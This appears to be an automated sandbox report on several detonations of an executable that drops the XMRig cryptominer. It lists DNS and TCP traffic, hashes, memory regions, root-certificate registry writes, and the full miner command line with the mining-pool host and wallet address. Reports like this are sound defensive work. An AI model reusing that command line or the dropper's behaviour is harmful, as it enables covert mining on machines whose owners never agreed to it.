US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3540-14-0x00000255AE790000-0x00000255AE7B0000-memory.dmp

memory/3540-15-0x00000255AE7E0000-0x00000255AE800000-memory.dmp

memory/3540-16-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-19-0x00000255AE800000-0x00000255AE820000-memory.dmp

memory/3540-18-0x00000255AE820000-0x00000255AE840000-memory.dmp

memory/3540-17-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-20-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-21-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-23-0x00000255AE800000-0x00000255AE820000-memory.dmp

memory/3540-22-0x00000255AE820000-0x00000255AE840000-memory.dmp

memory/3540-24-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-25-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-26-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-27-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-28-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-29-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-30-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-31-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-32-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-33-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-34-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-35-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-36-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-37-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-38-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-39-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-40-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-41-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-42-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-43-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-44-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-45-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-46-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-47-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-48-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-49-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-50-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-51-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-52-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-53-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-54-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-55-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-56-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-57-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-58-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-59-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-60-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-61-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-62-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-63-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-64-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-65-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-66-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-67-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-68-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-69-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-70-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-71-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-72-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-73-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-74-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-75-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-76-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-77-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-78-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-79-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-80-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-81-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

memory/3540-82-0x00007FF7A1E50000-0x00007FF7A2953000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:38

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1797s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1972 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 1972 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
IE 52.111.236.22:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4568-14-0x000001DFBC3A0000-0x000001DFBC3C0000-memory.dmp

memory/4568-15-0x000001DFBC700000-0x000001DFBC720000-memory.dmp

memory/4568-16-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-17-0x000001E0508C0000-0x000001E0508E0000-memory.dmp

memory/4568-18-0x000001E050690000-0x000001E0506B0000-memory.dmp

memory/4568-19-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-20-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-23-0x000001E050690000-0x000001E0506B0000-memory.dmp

memory/4568-22-0x000001E0508C0000-0x000001E0508E0000-memory.dmp

memory/4568-21-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-24-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-25-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-26-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-27-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-28-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-29-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-30-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-31-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-32-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-33-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-34-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-35-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-36-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-37-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-38-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-39-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-40-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-41-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-42-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-43-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-44-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-45-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-46-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-47-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-48-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-49-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-50-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-51-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-52-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-53-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-54-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-55-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-56-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-57-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-58-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-59-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-60-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-61-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-62-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-63-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-64-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-65-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-66-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-67-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-68-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-69-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-70-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-71-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-72-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-73-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-74-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-75-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-76-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-77-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-78-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-79-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-80-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-81-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

memory/4568-82-0x00007FF6504A0000-0x00007FF650FA3000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:32

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1800s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f159483